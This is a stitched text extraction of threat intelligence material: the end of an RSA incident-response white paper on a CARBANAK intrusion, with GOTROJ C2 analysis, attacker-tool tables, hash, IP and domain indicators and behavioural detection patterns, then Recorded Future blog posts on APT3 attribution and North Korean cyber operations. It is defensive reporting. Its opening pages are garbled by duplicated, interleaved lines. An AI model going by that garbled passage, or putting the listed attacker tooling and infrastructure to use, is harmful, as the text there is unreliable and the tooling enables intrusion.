Windows
Figure 53:
Deletion
of GOTROJ
Windows
Service
After
Execution
Figure
Figure 53:
53: Deletion
Deletion of
of GOTROJ
GOTROJ Windows
Windows Service
Service After
After Execution
Execution
Once successfully executed, GOTROJ communicates with 107.181.246.146 over TCP port 443.
Once successfully executed, GOTROJ communicates with 107.181.246.146
TCP portThe!Shadows!o
443.
! over
Once
successfully
executed,
GOTROJ
communicates
withsection,
107.181.246.146
When
Deleted:
When reviewing
reviewing the
the host
host screen
screen
s Scan
Scan Data
Data tab,
tab, under
under the
the Processes
Processes section,
we see
see where
where the
Deleted:
network
connection
with
ctlmon.exe
process
shown
network
connection
is correlated
correlated
with the
the running
running
ctlmon.exe
process
by clicking
clicking
on it,
it,under
asCase!Study:!CAR
shown
over
port 443.
When reviewing
the host
screen
Scan
Data
tab,
in Figure
Figure 54.
! is correlated
the Processes section, we see where the network connection
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
with the running ctlmon.exe process by clicking on it, as shown in
Figure 54.
Page
Page 54
Figure
54:54:
GOTROJ
NetworkConnection
Connection
Information
Figure
GOTROJProcess
ProcessExecuting
Executing and
and Network
Information
Figure 54: GOTROJ Process Executing and Network Connection Information
Additionally,
the GOTROJ
ctlmon.exe
binary itself
canitself
be triaged
the RSA
Additionally,
the GOTROJ
ctlmon.exe
binary
can bevia
triaged
via NetWitness
Endpoint module analyzer in order to identify the imported function and DLL information,
the RSA NetWitness Endpoint module analyzer in order to identify the
PE headerctlmon.exe
information and
searchable
static
strings
analysis. One
initial
triage
Additionally, entropy,
the GOTROJ
binary
itself
be triaged
via common
the RSA
NetWitness
imported
function
DLL information,
entropy,
header
information
search
pattern
identifying
possible
strings
common
port
value
strings,
such
Endpoint module analyzer in order to identify the imported function and DLL information,
:443.
searchable
The use of this
search
string
to triage
GOTROJ
Trojan
identifies
C2 IP address
static
strings
analysis.
common
initial
triage
search
pattern
entropy, PE header
information
searchable
static
strings
analysis.
and port value
in a clear text
string
at offset 0x3049304,
as evidenced
in Figure
55. common initia
identifying possible
possible C2C2
strings
is common
web portweb
valueport
strings,
such as
search pattern for for
identifying
strings
is common
value
strings, such
:443.
this
search
string
triage
GOTROJ
Trojan
identifies
:443.
The use of this search string to triage the GOTROJ Trojan identifies the C2 IP add
C2 IPtext
address
and port
value in0x3049304,
a clear text string
offset 0x3049304,
as 55.
and port value in athe
clear
string
at offset
as atevidenced
in Figure
evidenced in Figure 55.
Figure 55: C2 IP and Port Identification in Cursory Analysis via RSA NetWitness Endpoint Module Analyzer
Figure 55: C2 IP and Port Identification in Cursory Analysis via RSA NetWitness
Figure 55: C2 IP and Port Identification in Endpoint
CursoryModule
Analysis
via RSA NetWitness Endpoint Module A
Analyzer
WHITE PAPER
5. CONCLUSION
The attackers in this engagement primarily used modified versions of legitimate
administrative tools, commonly used penetration testing utilities and common
network file acquisition tools. Though specialty malware was observed during
this intrusion, the attackers used basic XOR encoding just above Layer 4 to
facilitate communication, communicated via SSH tunnel directly over TCP/443,
or just transmitted and received data in clear text across the network. Of the
observed actions during this intrusion, none of the attacker tools, techniques or
procedures was particularly advanced. However, they were still able to bypass
a significant security stack, obtain initial access and lateral access effectively,
deploy malware and toolsets with impunity, and traverse over 150 systems in
the span of six weeks. While, at first glance, this attack was not sophisticated
in its toolset, it was sophisticated in its operationalization and agility of actions
taken by the attackers. Upon reviewing the entirety of tools used in this
engagement, operational correlations can be made between the Linux and
Windows toolsets, as illustrated in Table 26.
Cross Platform Toolsets and Purpose
Linux
Windows
Function
Winexe
Tinyp
Lateral Movement
Auditunnel (Linux
Version)
Auditunnel (Windows
Version)
Ingress Tunneling
PScan (Linux Version)
PScan (Windows
Version)
Internal Recon
WGet (Linux Version)
WGet (Windows
Version)
Toolset Download
PSCP
File Transfer
Table 26: Cross-Platform Toolset Utilization
The CARBANAK actors not only showed the capability to successfully
compromise both Linux and Windows systems but they chose a toolset that
was either directly cross-platform or extremely similar in both function
and command line usage. This indicates a level of tactical organization and
operationalization not previously observed by this actor group. Additionally,
they were significantly cognizant and aware of actions taken by the security
team, switching to new methods of ingress after initial compromise, detected
remediation actions and environmental migration. They were methodical in
their choice of staging systems, basing the system utilized on:
a critical function of lateral access (such as systems BRAVO and DELTA) or
responder detection and investigation (such as system CHARLIE)
They chose key systems based on their needs rather than systems the
organization would consider
assets. They ensured the toolsets they
would interact with most often contained very similar functions and
commands across environments in order to limit mistakes made at the
WHITE PAPER
keyboard. They included a method, whether manually or automatically, to
remove records of their activities. They operated with purpose, patience,
planning and, most significantly, persistence.
This intrusion was successfully discovered, investigated, contained,
eradicated and remediated only due to the following reasons:
1. The organization invested in the necessary visibility at a host and network
level to allow analysts to rapidly and effectively hunt for and investigate
these types of threats.
2. The organization had invested and empowered their personnel to
creatively and proactively hunt for, understand, investigate and learn from
threats within their environment.
3. The organization had maintained a relationship with a proven and trusted
advisory practice and had worked to recreate and implement a solid and
proven Threat Hunting and Incident Response methodology within their
own organization.
4. The organization had a solid top-down understanding of what role
Threat Hunting and Incident Response held during daily operations and
security incidents, and provided the necessary support and enablement to
subordinate units and analysts.
While a first look at the tools used in this engagement may appear simplistic,
upon review of the entire intrusion it becomes quickly apparent that each
of them was purpose-chosen with an overall operationalized capability in
mind. CARBANAK has shown themselves to be a coordinated and extremely
persistent group of actors that are consistently moving towards more agile
methods of intrusion and standardization of processes across heterogeneous
environments. They have proven their capability to use that persistence
and agility to defeat or bypass organizational security controls. Even with
the least advanced of their capabilities, they can be a difficult adversary to
track within an environment due to their speed, efficiency, adaptability and
care in leaving little trace of any activity. However, this difficulty compounds
exponentially for organizations without the necessary visibility, practices,
methodologies or trusted partner relationships necessary to effectively
detect and respond to these types of threats. This case study shows that
with the necessary visibility, planning, methodology and analyst enablement,
organizations can be successful against these types of threats.
Disclaimer: This white paper and related graphics are provided for
informational and/or educational purposes. RSA is not responsible for errors,
omissions or for results obtained from the use of this information. This
white paper is being provided
as-is,
with no guarantee of completeness,
timeliness or accuracy, and without warranty of any kind. This white paper
is not intended to be a substitute for legal or other professional advice, and
constitutes the opinions of the author(s).
WHITE PAPER
6. INDICATORS OF COMPROMISE
6.1 ATOMIC INDICATORS OF COMPROMISE
Host Indicators
E3C061FA0450056E30285FD44A74CD2A
slpar.org
370D420948672E04BA8EAC10BFE6FC9C
centos-repo.org
90D4CC6D4B81B8C462F5AA7166FEE6FB
95.215.46.116
F9766140642C24D422E19E9CF35F2827
185.61.148.145
EB87856732236E1AC7E168FE264F1B43
185.61.148.96
B57DC2BC16DFDB3DE55923AEF9A98401
107.181.246.146
B3135736BCFDAB27F891DBE4009A8C80
192.99.14.211
0F1C4A2A795FB58BD3C5724AF6F1F71A
95.215.47.122
209BC26396E838E4B665FE3D1CCF7787
95.215.61.192
6499863D47B68030F0C5FFAFAFFB1344
5.45.179.173
752D245F1026482A967A763DAE184569
185.86.151.174
8B3A91038ECB2F57DE5BBD29848B6DC4
185.165.29.27
AB8BED25F9FF64A4B07BE5D3BC34F26B
185.117.88.97
7393CB0F409F8F51B7745981AC30B8B6
95.215.44.129
C4D746B8E5E8E12A50A18C9D61E01864
185.165.29.26
BD126A7B59D5D1F97BA89A3E71425731
6499863D47B68030F0C5FFAFAFFB1344
752D245F1026482A967A763DAE184569
1BD7D0C3023C55B5DF0201CC5D7BBCE1
C01FD758ABB423C8336EE1BD5035A6C7
BD126A7B59D5D1F97BA89A3E71425731
771FA63231FB42EE97AA17818A53F432
EDCE844A219C7534E6A1E7C77C3CB020
0810D239169A13FC0E2E53FC72D2E5F0
D66E31794836DFD2C344D0BE435C6D12
E3C061FA0450056E30285FD44A74CD2A
A365FD9076AF4D841C84ACCD58287801
9E2E4DF27698615DF92822646DC9E16B
5DDF9683692154986494CA9DD74B588F
F9766140642C24D422E19E9CF35F2827
D406E037F034B89C85758AF1A98110BE
D825FBD90087D2350E89CBF205A1B71C
Network Indicators
WHITE PAPER
6.2 Behavioral Indicators of Compromise
Host Indicators
C:\Windows\SysWOW64\zh-TW
Directory Usage
Outbound SSH over TCP/443
Command Line Arguments
Containing
-getfiles,
-copyfiles,
-copyself,
-cleanup
or
http://[0-9]
{1,3}\.
Outbound HTTP over TCP/443,
Direct to IP Address, User-Agent
Beginning with
wget
or
cmd.exe -> qwinsta.exe
Outbound SSH where Client
Application and Server Application =
openssh_5.3
or Client Application =
Server Application
WindowsCtlMonitor Windows
Service
PSEXESVC.EXE, WINEXESVC.EXE in
C:\Windows
/usr/share/man/mann Directory
Usage
ssh,
sshd,
auditd
in NonStandard Directories
Linux System Binary Names Not
Associated With RPM Package
Linux Child Processes with a Parent
of systemd Not Associated With
RPM Package
HKLM\SYSTEM\ControlSet001\
services\PSEXESVC Registry Entries
HKLM\SYSTEM\ControlSet001\
services\WINEXESVC Registry
Entries
Command Line Arguments Ending in
Command Line Arguments
Containing
\\[a-zA-Z0-9]{3,}
Network Indicators
WHITE PAPER
7. DIGITAL APPENDIX
Below is a list of the files and folders contained within the RSA_IR_
CARBANAK_Digital_Appendix. While specifically created for RSA
technologies, this Digital Appendix also contains traditional IOCs and
descriptive content that can be integrated into third-party technologies,
such as OSQuery, Moloch and SOF-ELK. For RSA NetWitness Suite users,
the supplied content is currently available in RSA Live but provided here
for custom content creation purposes. All content should be tested before
full integration into RSA NetWitness Endpoint, RSA NetWitness Logs and
Packets, or third-party tools to prevent any adverse effects from unknown
environmental variables.
RSA_IR_Digital_Appendix.zip File Hash:
AD4B3B859FA85957B479D824E19C9957
RSA_IR_Digital_Appendix.zip Contents:
NetWitness_Endpoint
oo tinyp_unique_command_line_arguments.sql
oo psexec_winexe_remote_service_creation.sql
NetWitness_Packets
oo RSA_IR_Carbanak_Domain.csv
List of Carbanak domains referenced in report
oo RSA_IR_Carbanak_Domain.xml
oo RSA_IR_Carbanak_IP.csv
List of Carbanak IPs referenced in report
oo RSA_IR_Carbanak_IP.xml
oo auditunnel_init.lua
AUDITUNNEL traffic pattern identification with comments
oo gotroj_beacon_parser.lua
GOTROJ traffic pattern identification with comments
CARBANAK_Hashset.md5
List of Carbanak file hashes referenced in report
RSA and the RSA logo, are registered trademarks or trademarks of Dell Technologies in
the United States and other countries.
Copyright 2017 Dell Technologies. All rights reserved.
Published in the USA. 10/17 White Paper H16777.
RSA believes the information in this document is accurate as of its publication date.
The information is subject to change without notice.
Recorded Future Research Concludes Chinese Ministry of
State Security Behind APT3
recordedfuture.com /chinese-mss-behind-apt3/
The Recorded Future Blog
5/17/2017
Posted in
Cyber Threat Intelligence
by Insikt Group on May 17, 2017
This is the first time researchers have been able to attribute a
threat actor group with a high degree of confidence to the
Ministry of State Security.
Key Takeaways
APT3 is the first threat actor group that has been attributed with a high degree of confidence directly to the
Chinese Ministry of State Security (MSS).
On May 9, a mysterious group called
intrusiontruth
attributed APT3 to a company, Guangzhou Boyu
Information Technology Company, based in Guangzhou, China.
Recorded Future
s open source research and analysis has corroborated the company, also known as
Boyusec, is working on behalf of the Chinese Ministry of State Security.
Customers should re-examine any intrusion activity known or suspected to be APT3 and all activity from
associated malware families as well as re-evaluate security controls and policies.
Introduction
On May 9, a mysterious group calling itself
intrusiontruth
identified a contractor for the Chinese Ministry of State
Security (MSS) as the group behind the APT3 cyber intrusions.
Recorded Future timeline of APT3 victims.
Screenshot of a blog post from
intrusiontruth in APT3.
Intrusiontruth
documented historic connections between domains used by an APT3 tool called Pirpi and two
shareholders in a Chinese information security company named Guangzhou Boyu Information Technology
Company, Ltd (also known as Boyusec).
Registration information for a domain linked to the malware Pirpi. The details show the domain was registered to
Dong Hao and Boyusec.
APT3 has traditionally targeted a wide-range of companies and technologies, likely to fulfill intelligence collection
requirements on behalf of the MSS (see research below). Recorded Future has been closely following APT3 and
has discovered additional information corroborating that the MSS is responsible for the intrusion activity conducted
by the group.
Recorded Future Intel Card for APT3.
Background
APT3 (also known as UPS, Gothic Panda, and TG-011) is a sophisticated threat group that has been active since at
least 2010. APT3 utilizes a broad range of tools and techniques including spearphishing attacks, zero-day exploits,
and numerous unique and publicly available remote access tools (RAT). Victims of APT3 intrusions include
companies in the defense, telecommunications, transportation, and advanced technology sectors
as well as
government departments and bureaus in Hong Kong, the U.S., and several other countries.
Analysis
On Boyusec
s website, the company explicitly identifies two organizations that it cooperatively partners with,
Huawei Technologies and the Guangdong Information Technology Security Evaluation Center (or Guangdong
ITSEC).
Screenshot of Boyusec
s website where Huawei and Guangdong ITSEC are
identified as collaborative partners.
In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed
a product that Boyusec and Huawei were jointly producing. According to the Pentagon
s report, the two companies
were working together to produce security products, likely containing a backdoor, that would allow Chinese
intelligence
to capture data and control computer and telecommunications equipment.
The article quotes
government officials and analysts stating that Boyusec and the MSS are
closely connected,
and that Boyusec
appears to be a cover company for the MSS.
Imagery
2017 DigitalGlobe, Map data
2017
Boyusec is located in Room 1103 of the Huapu Square West Tower in Guangzhou, China.
Boyusec
s work with its other
cooperative partner,
Guangdong ITSEC, has been less well-documented. As will be
laid out below, Recorded Future
s research has concluded that Guangdong ITSEC is subordinate to an MSS-run
organization called China Information Technology Evaluation Center (CNITSEC) and that Boyusec has been working
with Guangdong ITSEC on a joint active defense lab since 2014.
Guangdong ITSEC is one in a nation-wide network of security evaluation centers certified and administered by
CNITSEC. According to Chinese state-run media, Guangdong ITSEC became the sixteenth nationwide branch of
CNITSEC in May 2011. Guangdong ITSEC
s site also lists itself as CNITSEC
s Guangdong Office on its header.
According to academic research published in China and Cybersecurity: Espionage, Strategy, and Politics in the
Digital Domain, CNITSEC is run by the MSS and houses much of the intelligence service
s technical cyber
expertise. CNITSEC is used by the MSS to
conduct vulnerability testing and software reliability assessments.
Per
a 2009 U.S. State Department cable, it is believed China may also use vulnerabilities derived from CNITSEC
activities in intelligence operations. CNITSEC
s Director, Wu Shizhong, even self-identifies as MSS, including for his
work as a deputy head of China
s National Information Security Standards Committee as recently as January 2016.
Recorded Future research identified several job advertisements on Chinese-language job sites such as
jobs.zhaopin.com, jobui.com, and kanzhun.com since 2015, Boyusec revealed a collaboratively established joint
active defense lab (referred to as an ADUL) with Guangdong ITSEC in 2014. Boyusec stated that the mission of the
joint lab was to develop risk-based security technology and to provide users with innovative network defense
capabilities.
Job posting where Boyusec highlights the joint lab with Guangdong ITSEC. The translated text is,
In 2014,
Guangzhou Boyu Information Technology Company and Guangdong ITSEC cooperated closely to establish a joint
active defense lab (ADUL).
Conclusion
The lifecycle of APT3 is emblematic of how the MSS conducts operations in both the human and cyber domains.
According to scholars of Chinese intelligence, the MSS is composed of national, provincial, and local elements.
Many of these elements, especially at the provincial and local levels, include organizations with valid public missions
to act as a cover for MSS intelligence operations. Some of these organizations include think tanks such as CICIR,
while others include provincial-level governments and local offices.
In the case of APT3 and Boyusec, this MSS operational concept serves as a model for understanding the cyber
activity and lifecycle:
While Boyusec has a website, an online presence, and a stated
information security services
mission, it
cites only two partners, Huawei and Guangdong ITSEC.
Intrusiontruth and the Washington Free Beacon have linked Boyusec to supporting and engaging in cyber
activity on behalf of the Chinese intelligence services.
Recorded Future
s open source research has revealed that Boyusec
s other partner is a field office for a
branch of the MSS. Boyusec and Guangdong ITSEC have been documented working collaboratively together
since at least 2014.
Academic research spanning decades documents an MSS operational model that utilizes organizations,
seemingly without an intelligence mission, at all levels of the state to serve as cover for MSS intelligence
operations.
According to its website, Boyusec has only two collaborative partners, one of which (Huawei) it is working
with to support Chinese intelligence services, the other, Guangdong ITSEC, which is actually a field site for a
branch of the MSS.
Graphic displaying the relationship between the MSS and APT3.
Impact
The implications are clear and expansive. Recorded Future
s research leads us to attribute APT3 to the Chinese
Ministry of State Security and Boyusec with a high degree of confidence. Boyusec has a documented history of
producing malicious technology and working with the Chinese intelligence services.
APT3 is the first threat actor group that has been attributed with a high degree of confidence directly to the MSS.
Companies in sectors that have been victimized by APT3 now must adjust their strategies to defend against the
resources and technology of the Chinese government. In this real-life David versus Goliath situation, customers
need both smart security controls and policy, as well as actionable and strategic threat intelligence.
APT3 is not just another cyber threat group engaging in malicious cyber activity; research indicates that Boyusec is
an asset of the MSS and their activities support China
s political, economic, diplomatic, and military goals.
The MSS derives intelligence collection requirements from state and party leadership, many of which are defined
broadly every five years in official government directives called Five Year Plans. Many APT3 victims have fallen into
sectors highlighted by the most recent Five Year Plan, including green/alternative energy, defense-related science
and technology, biomedical, and aerospace.
North Korea Is Not Crazy
www.recordedfuture.com /north-korea-cyber-activity/
The Recorded Future Blog
by Insikt Group on June 15, 2017
Intent is critical to comprehending North Korean cyber activity.
Understanding North Korean national objectives, state organizations, and military strategy are key to, and often
missing from, discussions about attributing North Korean cyber activity. Frequently, senior political leaders, cyber
security professionals, and diplomats describe North Korean leaders or their respective actions as
crazy,
erratic,
not rational.
This is not the case. When examined through the lens of North Korean military strategy, national
goals, and security perceptions, cyber activities correspond to their larger approach.
Recorded Future research reveals that North Korean cyber actors are not crazy or irrational: they just have a wider
operational scope than most other intelligence services.
This scope comprises a broad range of criminal and terrorist activity, including illegal drug manufacturing and
selling, counterfeit currency production, bombings, assassination attempts, and more. The National Security Agency
(NSA) has attributed the April WannaCry ransomware attacks to North Korea
s intelligence service, the
Reconnaissance General Bureau (RGB). We assess that use of ransomware to raise funds for the state would fall
under both North Korea
s asymmetric military strategy and
self-financing
policy, and be within the broad
operational remit of their intelligence services.
Background
The Democratic People
s Republic of Korea (DPRK or North Korea) is a
hereditary, Asian monarchy with state, party, and military organizations
dedicated to preserving the leadership of the Kim family. North Korea is
organized around its communist party, the Korean Worker
s Party
(KWP), and the military, the Korean People
s Army (KPA).
The Reconnaissance General Bureau (RGB), also known as
Unit 586,
was formed in 2009 after a large restructure of several state, military,
and party intelligence elements. Subordinate to the KPA, it has since
emerged as not just the dominant North Korean foreign intelligence
service, but also the center for clandestine operations. The RGB and its
predecessor organizations are believed responsible for a series of
bombings, assassination attempts, hijackings, and kidnappings
commencing in the late 1950s, as well as a litany of criminal activities,
including drug smuggling and manufacturing, counterfeiting, destructive
cyber attacks, and more.
Satellite Image of the RGB Southern Operations Building in Pyongyang. ( Source)
As North Korea
s lead for clandestine operations, the RGB is also likely the primary cyber operations organization as
well. As described by the Center for Strategic and International Studies in 2015 report:
The RGB is a hub of North Korean intelligence, commando, and sabotage operations. The RGB history of its
leadership and component parts paints a picture of a one-stop shop for illegal and clandestine activity conducted
outside the DPRK. The RGB and, prior to 2009 its component parts, have been involved in everything from
maritime-inserted commando raids to abductions and spying. For the RGB to be in control of cyber assets indicates
that the DPRK intends to use these assets for provocative purposes.
The RGB probably consists of seven bureaus; six original bureaus and a new seventh (Bureau 121) that was likely
added sometime after 2013.
RGB organizational chart, compiled with information from The Korea Herald, 38 North, and CSIS.
Bureau 121 is probably North Korea
s primary cyber operations unit, but there are other units within the KPA and
KWP that may also conduct cyber operations.
Attribution of specific cyber activity to the North Korean state or intelligence organizations is difficult, and up until
recently, circumstantial. On June 12, US-CERT released a joint technical alert that summarized analysis conducted
by the U.S. Department of Homeland Security (DHS) and FBI on the
tools and infrastructure used by cyber actors
of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the
United States and globally.
This alert marked the first time the U.S. government linked threat actor groups and malware long-suspected to be
utilized by North Korean state-sponsored actors with the with North Korean government itself. DHS and FBI
explicitly identified two threat actor groups, Lazarus Group and Guardians of Peace, and three tools, Destover, Wild
Positron/Duuzer, and Hangman, as used by the North Korean government. While the FBI and DHS identified many
indicators of compromise, Yara rules, and network signatures, the report did not provide any evidence supporting the
attribution to the North Korean government or details on which organization or unit might be responsible.
Lazarus Group, now known to be North Korean state-sponsored actors, have been conducting operations since at
least 2009, with a DDoS attack on U.S. and South Korean websites using the MYDOOM worm. Until late 2015,
Lazarus Group cyber activities primarily focused on South Korean and U.S. government and financial organizations,
including destructive attacks on South Korean banking and media sectors in 2013 and highly publicized attack on
Sony Pictures Entertainment in 2014.
Timeline of Lazarus Group cyber operations since 2009.
In early 2016, a new pattern of activity began to emerge in an unusual operation against the Bangladesh Central
Bank. Actors obtained the legitimate Bangladesh Central Bank credentials for the SWIFT interbank messaging
system and used them to attempt to transfer $951 million of the bank
s funds to accounts around the world. A few
simple errors by the actors (and some pure luck) allowed central bankers to prevent the transfer of or recover most
of the funds, but the attackers ended up getting away with nearly $81 million.
The National Security Agency ( NSA) has attributed this attack on the Bangladesh Central Bank to the North Korean
state, however, the investigation within the U.S. government is still ongoing. Threat analysts from numerous
companies have attributed this attack and subsequent attacks on banks around the world through early 2017 to the
Lazarus Group (which DHS, FBI, and NSA have all linked to the North Korean government over the past three
days).
According to a Washington Post report published on June 14, the NSA has compiled an intelligence assessment on
the WannaCry campaign and has attributed the creation of the WannaCry worm to
cyber actors sponsored by
the
RGB. This assessment, which was apparently issued internally last week, cited
moderate confidence
in the
attribution and ascribed the April campaign as an
attempt to raise revenue for the regime.
The attacks on the Bangladesh Central Bank, additional banks around the world, and the WannaCry ransomware
campaign represent a new phase in North Korean cyber operations, one that mirrors the phases of violence and
criminality North Korea has passed through over the past 50 years. We will examine these phases later in this post.
The broad operational range of known and suspected North Korean cyber operations has for years raised questions
about the rationality of North Korean leadership, possible motivations and benefits for the country from this type of
cyber activity, and why North Korea would deny responsibility for these attacks. Recorded Future research
addresses these questions by examining the whole picture and pairing geopolitical and strategic intelligence with
threat intelligence.
Analysis
Digging into some of these past North Korean activities is important to add context to the cyber operations we have
tracked since 2009. North Korea
s engagement in a wide range of criminal and terrorist activities is part of its broad
national strategy, which employs asymmetric operations and surprise attacks to overcome North Korea
conventional national power deficit.
According to an interview with a former U.S. State Department official, and North Korea expert, in Vanity Fair,
crime, in other words, has become an integral part of North Korea
s economy.
It not only pays, it plays to their
strategy of undermining Western interests.1
It is critical to place North Korea
s criminal and cyber activity in the context of its larger military and national security
strategies which support two primary objectives:
1. Perpetuation of the Kim regime,
2. Unification of the Korean peninsula under North Korean leadership.
A 2016 University of Washington study succinctly summarizes North Korea
s asymmetric military strategy:
Since the end of the Korean War, North Korea has developed an asymmetric military strategy, weapons, and
strength because its conventional military power is far weaker than that of the U.S. and South Korea. Thus, North
Korea has developed three military strategic pillars: surprise attack; quick decisive war; mixed tactics. First, its
surprise attack strategy refers to attacking the enemy at an unexpected time and place. Second, its quick decisive
war strategy is to defeat the South Korean military before the U.S. military or international community could
intervene. Lastly, its mixed tactics strategy is to use multiple tactics at the same time to achieve its strategic goal.
Despite their near-constant tirade of bellicose rhetoric and professions of strength, North Korea fundamentally views
the world from a position of weakness, and has developed a national strategy that utilizes its comparative strengths
complete control over a population of 25 million people and unflinching, amoral devotion to the Kim hereditary
dynasty.
In this context, criminality, terrorism, and destructive cyber attacks all fit within the North Korean asymmetric military
strategy which emphasizes surprise attacks and mixed tactics. The criminality and cyber attacks also have the
added bonus of enabling North Korea to undermine the very international economic and political systems that
constrain and punish it.
Evidence is mounting that sanctions, international pressure, and possibly increased enforcement by China are
beginning to take their toll on the North Korean economy and in particular, North Korea intelligence agent
s ability to
procure goods for regime leadership. A May 2017 report from the Korea Development Institute concluded that North
Korea
s black market had helped the nation endure the impacts of the international sanctions last year.
Detailed below are numerous non-cyber operations that have been conducted by the predecessor organizations of
the RGB. The violence, destruction, and criminal breadth of these operations reveal the broad operational scope of
these intelligence services and the context in which they are conducted.
This data further reveals a history of denials by North Korea of responsibility for operations dating back to the 1960s,
putting into context the current leadership
s denials of cyber operations.
Note
The activities detailed below are intended to be illustrative, not an exhaustive list, of the broad operational remit for
North Korean operations.
Blue House Raid
One of the first major attacks on South Korea since the armistice was declared after the Korean War in 1953
occurred in 1968. The so-called
Blue House Raid
was an assassination attempt on then-President Park Chung
Hee by 31 North Korean special operations soldiers on the night of January 20, 1968. The 31 North Korean soldiers
crossed the DeMilitarized Zone (DMZ) on foot and managed to get within a half mile of the President
s residence
(the so-called
Blue House
) before being exposed. Upon discovery the North Korean soldiers engaged in a series
of firefights with South Korean forces; 68 South Koreans and three U.S. soldiers were killed. Most of the North
Korean soldiers were killed in the eight days after the raid; two made it back across the DMZ and one was captured.
The captured North Korean soldier claimed during a press conference that they had come to
cut Park Chung Hee
throat.
That account was disputed during a secret meeting in 1972 between a South Korean intelligence official
and the then-Premier Kim Il-sung. Kim claimed his government had nothing to do with the raid and
did not even
know about it at the time.
A captured North Korean soldier after the Blue House Raid. (Source)
1983 Rangoon Bombing
On October 9, 1983, three North Korean soldiers attempted to assassinate then-South Korean President Chun Doo
Hwan while on a trip to Myanmar. A bomb at a mausoleum the President was scheduled to visit detonated early,
killing 21 people, including the Korean Foreign Minister and Deputy Prime Minister.
During the trial for the bombers, testimony revealed that the North Korean agents used a North Korean trading
vessel to travel to Myanmar and the home of a North Korean diplomat to prepare the bombs. In a classified report
(report was declassified in 2000) ten days after the bombing, CIA analysts laid out a strong case that North Korea
was responsible for the attack despite official denials of involvement from the official North Korean news agency.
North Korean state media even accused President Chun of using the attack to increase tensions on the peninsula.
South Korean officials wait at the mausoleum in Rangoon minutes
before the bomb detonated. (Source)
Korean Air Flight 858 Bombing
On November 29, 1987, two North Korean intelligence agents boarded and placed a bomb on a Korean Air flight
from Baghdad, Iraq to Seoul. During a layover in Abu Dhabi, the two agents de-planed but left the bomb (disguised
as a radio) onboard. The bomb detonated and the plane crashed in the jungle on the Thai-Burma border and killed
all 115 people on board.
One of the North Korean intelligence agents, who was captured alive, later revealed that the bombing was meant to
discourage foreign participation in the 1988 Olympic Games in Seoul and create unrest
in South Korea. The agent
also confessed that the order to bomb the plane had come directly from then North Korean leader Kim Il-Sung or his
son, later leader Kim Jong-il.
Transition to Criminality
By the mid-1990s, North Korea had generally shifted from acts of terrorism to criminality. While North Korea had
held a policy of
self-financing,2
in which embassies and diplomatic outposts were forced to earn money for their
own operations typically via engaging in illicit activity such as smuggling, since the late 1970s, it was during the
1990s that this criminality became a business of the entire state and not just the diplomatic establishment. A number
of factors affected this shift, including the end of the Cold War and the withdrawal of crucial aid from benefactors
(like the Soviet Union and China), a crippling famine, a leadership transition, and years of international
condemnation and punitive actions.
A 2015 report from the Committee for Human Rights in North Korea characterizes North Korea
s involvement in
illicit economic activities
into three separate phases. First, from the origins of North Korea state involvement in the
1970s through mid-1990s, from the mid-90s through the mid-2000s, and approximately 2005 to today. The RGB, its
predecessor organizations, and other military and intelligence services support these illicit activities.
Illegal Drug Manufacturing and Smuggling
North Korea has had a state-sponsored drug smuggling (and later manufacturing as well) program since the mid1970s. This vast enterprise has been supported by the military, intelligence services, and diplomats and has often
included working with criminal organizations such as the Taiwanese gang United Bamboo, Philippine criminal
syndicates, and Japanese organized crime.3
Academic research indicates that North Korea has developed extensive covert smuggling networks and capabilities
primarily to provide a means of hard currency for the Kim regime.
The North Korean state actively cultivates opium poppy and produces as much as 50 metric tons of raw opium per
year. To put that in context, the United Nations estimates that Afghanistan produced 6,400 tons of raw opium in
2014, which makes North Korea a minor producer in comparison. According to a Congressional Research Service
report, government processing labs have the capacity to process twice that amount into opium or heroin each year.
Experts estimate that North Korea brings in as much as $550 million to $1 billion annually from illicit economic
activities.
Counterfeiting
One of the more widely reported North Korean criminal enterprises has been the production of counterfeit American
$100 (and $50) bills, or so-called
supernotes.
In a 2006 Congressional testimony, the U.S. Secret Service made a
definitive link between the production of the
supernote
and the North Korean state.
According to interviews in a 2006 New York Times Magazine article, North Korean state support for counterfeiting
U.S. currency dates back to a directive issued by Kim Jong-il in the mid-1970s. Original counterfeiting involved
bleaching $1 bills and reprinting them as $100 notes and evolved over time as North Korea
s international isolation
grew and its economy collapsed.
Supernote
and a real $100 bill. (Source)
Distribution and production of the supernotes followed a similar pattern to North Korean-produced narcotics, utilizing
global criminal syndicates, state and intelligence officials, and legitimate businesses. North Korea has repeatedly
denied involvement in counterfeiting or any illegal operations.
A History of Denial
As outlined above, North Korea has a history of denying responsibility for their violent, illicit, and destructive
operations. This includes denying involvement in the Blue House Raid, the Rangoon Bombing, all criminal and illicit
activity including counterfeiting U.S. dollars, the Sony Pictures Entertainment attack, and the Bangladesh Central
Bank robbery. Some scholars argue that acts such as counterfeiting a nation
s currency constitutes a casus belli, an
action or event that justifies war, and others argue that
international legal norms and constructs do not adequately
address what constitutes casus belli in the cyber domain.
Both of these arguments, as well as an understanding of North Korea
s asymmetric military strategy, underscore
why North Korea would not want to claim responsibility for many of these destructive and violent acts.
Acknowledging state responsibility could provide the United States or South Korea with a valid casus belli, resulting
in a war that North Korea would most certainly lose. Even if the evidence is strong, official government denials
create uncertainty and give North Korea space to continue operations.
Impact
What has been missing from the discussion about whether North Korea is responsible for the WannaCry campaign
and the bank heists has been the why
the geopolitical and strategic intelligence that give CSOs, security
professionals, and threat analysts context for the activity they are seeing.
As of last week the NSA and several companies, including Symantec and Kaspersky, have linked the recent
WannaCry ransomware campaign to North Korea; Recorded Future assesses that this type of cyber activity would
fall within both North Korea
self-financing
policy and asymmetric military strategy.
In this context, as a nation that is under immense international financial and political pressure and one that employs
these types of policies and strategies, Recorded Future believes that North Korean cyber operations (with the goal of
acquiring hard currency) will continue for at least the short to medium term (one to three years). Additionally,
destructive cyber operations against the South Korean government and commercial entities will persist over this
same term and likely expand to Japanese or Western organizations if U.S. and North Korea tensions remain high.
The cyber threat environment and military strategy framed above indicate that companies in several major
economic sectors should increase monitoring of North Korean cyber activity. Financial services firms must remain
constantly vigilant to exploitation of their SWIFT connections and credentials, possible destructive malware attacks
and DDoS, and threats to customer accounts and data. Companies in the government contracting and defense
sectors, especially companies that support the Terminal High Altitude Area Defense (THAAD) system deployment as
well as U.S. or South Korean operations on peninsula, should be aware of the heightened threat environment to
their networks and operations on the Korean peninsula.
Energy and media companies, particularly those located in or that support these sectors in South Korea, should be
